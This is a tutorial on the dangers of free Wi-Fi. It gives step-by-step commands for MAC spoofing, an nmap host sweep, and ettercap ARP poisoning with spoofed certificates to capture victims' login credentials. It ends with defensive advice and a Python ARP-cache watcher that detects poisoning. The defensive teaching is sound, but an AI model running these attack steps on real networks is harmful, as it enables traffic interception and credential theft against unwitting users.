The (Obvious?) Dangers of Free Wi-Fi

by Azazel

Free public Wi-Fi hotspots are pretty commonly available these days.

Libraries, Barnes & Noble, and Starbucks are just a few places where one can go and connect to the Internet for free.

Of course, by now everyone knows the dangers of connecting to these hotspots, right?  Well, obviously not or I wouldn't be writing this.

Here, I'm going to walk you through one of the greatest dangers of connecting to a free, unencrypted wireless access point: the notorious "man-in-the-middle" attacks.

Keep in mind, this attack can be perpetrated on any wireless access point the attacker has access to, whether he legitimately has access or has cracked a key to gain access.  The fact that these public access points are open just makes it that much easier.  If you try anything demonstrated here, make sure to only do so on a network in which you have permission from the administrator.

First, let's change our MAC address.  After all, we're joining a public network, we want some privacy for crying out loud!  Open a root shell and type:

# ifconfig eth0 down
# ifconfig eth0 hw ether XX:XX:XX:XX:XX:XX
# ifconfig eth0 up

Where eth0 is replaced with whatever your wireless interface is and the Xs are replaced by whichever 48-bit address (six hexadecimal octets) you choose for your new MAC address.

Now let's join the network.

If it's an open network, as free hotspots are, this is easy enough.  Once you've joined, type ifconfig in the console to see what IP address you've been assigned.

In order to find a target, we'll have to find another host on the network.  You can use any scanner for this, but I prefer Nmap.  For the purposes of this article, we can just do a simple ping sweep by using the command:

$ nmap -sP 192.168.1.0-254

For example, on a 192.168.50.0/24 network the sweep looks like this:

$ nmap -sP 192.168.50.0-254
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-05 17:41 CST
Nmap scan report for RT-AX1800S-BAB8 (192.168.50.1)
Host is up (0.038s latency).
Nmap scan report for 192.168.50.100
Host is up (0.0037s latency).
Nmap scan report for kali (192.168.50.101)
Host is up (0.00049s latency).
Nmap scan report for 192.168.50.122
Host is up (0.11s latency).
Nmap scan report for 50TCLRokuTV (192.168.50.123)
Host is up (0.013s latency).
Nmap scan report for lwip0 (192.168.50.152)
Host is up (0.087s latency).
Nmap scan report for My-ecobee (192.168.50.210)
Host is up (0.018s latency).
Nmap done: 255 IP addresses (7 hosts up) scanned in 4.83 seconds

Make sure to use the appropriate private IP range and subnet for the network you're connected to.

You'll get a list of hosts who are up and on the network.  Run a quick check for the default gateway by typing:

$ route -nee
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface    MSS   Window irtt
0.0.0.0         192.168.1.1     0.0.0.0         UG    100    0        0 eth0     0     0      0
192.168.0.0     0.0.0.0         255.255.255.0   U     100    0        0 eth0     0     0      0

and making a note of the gateway IP address.

The next step is ARP poisoning the victim and becoming the "man-in-the-middle."

For this, we'll use Ettercap.

Ettercap is a very versatile suite with many useful tools.  In fact, had we chosen to, we could've used this for the host scan.  It can be used for packet sniffing/logging, data injection, and many other things which we will touch upon later.

But we still need to do a little configuring before we can continue.  We will first need to enable IP forwarding, so open a console and type:

# echo 1 > /proc/sys/net/ipv4/ip_forward

Next, open the etter.conf file and, in the Linux section, remove the comment hashes from the two redir_command_on and redir_command_off statements that follow the "# if you use iptables:" line (these let Ettercap redirect SSL connections through itself).  Ettercap is now ready to go.

In a console enter the following:

# ettercap -i eth0 -Tq -M arp:remote /gateway_ipaddress/ /victim_ipaddress/

Here, -i indicates your interface.

The -T switch designates a text only interface.

By pressing "h" while in this mode, you will get more options, including the option to activate plug-ins.

-M starts your man-in-the-middle attack, where arp:remote is your method:argument.

By specifying arp, we are using the ARP poisoning method.  ARP poisoning, also known as ARP spoofing, sends forged ARP replies that fool the network nodes into associating the attacker's MAC address with the IP address of another host (here, the gateway and the victim).

As such, traffic meant for the victim will go to the attacker, who can then choose to forward that traffic along to the intended recipient (as we will in this case).  Alternatively, the attacker could associate a non-existent MAC address with the default gateway, which would result in a DoS.  And that's it!

As an attacker, you now stand between the victim and the gateway and have the ability to intercept and manipulate all the traffic between them.

Let's go a step further in demonstrating how dangerous free hotspots are.

Let's start Ettercap with this command instead:

# ettercap -i eth0 -Tq -M arp:remote /gateway_ipaddress/ /victim_ipaddress/ -P remote_browser

Launch Firefox and watch as your browser seemingly navigates itself.

Actually, you're following along with what the victim is browsing.  As the victim navigates to Gmail or eBay or other SSL sites, keep an eye on the console where you first opened Ettercap.

The victim's credentials will appear as they are supplied.  Ettercap passes spoofed certificates to the victim, so all the victim will notice is a certificate warning as they attempt to sign in.

This attack is based on the assumption that people will just accept these blindly.  The victim may think that they are receiving this just because they are on a different network or, more likely, they may not care.  Either way, there's a good chance it will be accepted and they will then enter their credentials.

If you're having a problem getting the remote_browser plug-in to work, open up etter.conf again.

Under [privs] change the values of ec_uid and ec_gid to 0 (zero).

Then scroll down to the line that reads:

remote_browser = mozilla -remote openurl(http://%host%url)

and change mozilla to firefox.

The attacker has seen the browsing habits of the victim and obtained information to access secure sites at a later time.  What this really means is the attacker may now know the victim's interests or place of employment and may have access to the victim's personal information.

From here, we hardly have to use our imagination to consider what could happen to the victim.  The attacker has enough information on which to base some clever social engineering attacks, and this innocent, though ignorant, Wi-Fi user who just came to have some coffee and check e-mail has become a potential victim for identity theft.

As I said before, Ettercap is a versatile tool.

An attacker can ARP poison more than one victim at a time, although if you're following along with them in a browser it can get messy.  There are many other things that can be done while acting as man-in-the-middle.

I will mention some, and Ettercap can be used for most of them, but I will not go into detail.  An attacker can redirect traffic.

For instance, if you hate Best Buy, you can redirect all requests for bestbuy.com to anti-Best Buy sites.

An attacker can also manipulate data, replacing pictures or snippets of text.  Play around with different switches and plug-ins, read the man pages, experiment with it, and have phun!

Most importantly, remember how insecure free Wi-Fi hotspots are.

Playing "D"

How can we protect ourselves against man-in-the-middle attacks?

Obviously, don't use public Wi-Fi spots.

But if you have to, do not do anything you wouldn't like anyone else to see, especially typing in usernames or passwords, and never click through a certificate warning on a site you are about to sign in to.

As an administrator of a small network, you can implement static IP addressing as opposed to DHCP.  Also consider implementing static ARP tables.  Enabling MAC address filtering on your router may also help prevent unauthorized clients from joining your network.

All of these methods will work on larger networks as well, but will become quite cumbersome for the administrator.

A program like arpwatch, or WinARPwatch for Windows, will monitor your ARP cache and let you know if a known association of IP addresses and MAC addresses has changed.

Also, don't broadcast your SSID.  Make sure to use a complex WPA2 passphrase using a combination of uppercase and lowercase letters, numbers, and non-alphanumeric characters.  Don't use words that will be found in a dictionary.

One last thing: the reason we initially spoofed our MAC address was that a vigilant user or admin could easily find the MAC address of an attacker by checking their ARP cache, using the command:

$ arp -a -i <device name>

For example:

$ arp -a -i eth0
RT-AX1800S-BAB8 (192.168.50.1) at a0:36:bc:1e:e2:c7 [ether] on eth0
? (192.168.50.100) at ac:22:0b:e8:1f:f2 [ether] on eth0
? (192.168.50.102) at <incomplete> on eth0
50TCLRokuTV (192.168.50.123) at 1c:30:08:b8:4c:dd [ether] on eth0

or arp -a in Windows.
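As an added example (not from the article or the arpwatch project), here is a small Python watcher in the spirit of arpwatch: it parses `arp -a` output in both the Linux format shown above and the Windows format, keeps a baseline of IP-to-MAC mappings, and flags the two traces the poisoning described earlier leaves in a victim's cache, a known IP whose MAC changed and one MAC claiming several IPs. The sample listings are constructed from the article's addresses.

```python
import re
from collections import defaultdict
# Linux net-tools `arp -a` line, as shown in the article:
#   RT-AX1800S-BAB8 (192.168.50.1) at a0:36:bc:1e:e2:c7 [ether] on eth0
LINUX_LINE = re.compile(
    r"^\S+ \((?P<ip>[\d.]+)\) at (?P<mac>[0-9a-f:]{17}|<incomplete>)", re.I)
# Windows `arp -a` line:  192.168.50.1   a0-36-bc-1e-e2-c7   dynamic
WINDOWS_LINE = re.compile(
    r"^(?P<ip>[\d.]+)\s+(?P<mac>(?:[0-9a-f]{2}-){5}[0-9a-f]{2})\s+\w+", re.I)

def parse_arp_a(text):
    """Return {ip: mac} for resolved entries, MACs normalised to aa:bb:... form."""
    table = {}
    for raw in text.splitlines():
        line = raw.strip()
        m = LINUX_LINE.match(line) or WINDOWS_LINE.match(line)
        if m is None or m.group("mac") == "<incomplete>":
            continue  # headers, blank lines and unresolved entries
        table[m.group("ip")] = m.group("mac").lower().replace("-", ":")
    return table

def check_arp(baseline, current):
    """Compare a new snapshot against the baseline; return a list of alerts."""
    alerts = []
    # 1. A known IP now answers with a different MAC (arpwatch calls this a flip-flop).
    for ip, mac in current.items():
        old = baseline.get(ip)
        if old is not None and old != mac:
            alerts.append(f"flip-flop {ip}: {old} -> {mac}")
    # 2. One MAC claims several IPs: while the poisoning runs, the gateway and the
    #    attacker's own host resolve to the same hardware address on the victim.
    owners = defaultdict(set)
    for ip, mac in current.items():
        owners[mac].add(ip)
    for mac, ips in sorted(owners.items()):
        if len(ips) > 1:
            alerts.append(f"duplicate MAC {mac} for {', '.join(sorted(ips))}")
    return alerts
# Constructed samples: BASELINE reuses the article's listing; POISONED is what the
# same victim sees once its gateway entry points at 192.168.50.100's MAC.
BASELINE = """\
RT-AX1800S-BAB8 (192.168.50.1) at a0:36:bc:1e:e2:c7 [ether] on eth0
? (192.168.50.100) at ac:22:0b:e8:1f:f2 [ether] on eth0
? (192.168.50.102) at <incomplete> on eth0
"""
POISONED = """\
RT-AX1800S-BAB8 (192.168.50.1) at ac:22:0b:e8:1f:f2 [ether] on eth0
? (192.168.50.100) at ac:22:0b:e8:1f:f2 [ether] on eth0
"""
```

Feed the output of `arp -a` taken at two different times into parse_arp_a and compare them with check_arp; an empty list means no mapping changed.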
